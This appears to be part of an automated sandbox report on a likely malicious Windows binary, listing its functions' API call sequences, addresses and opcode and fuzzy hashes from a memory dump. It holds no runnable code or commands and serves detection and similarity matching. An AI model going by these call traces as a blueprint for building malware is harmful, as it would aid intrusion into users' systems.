  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
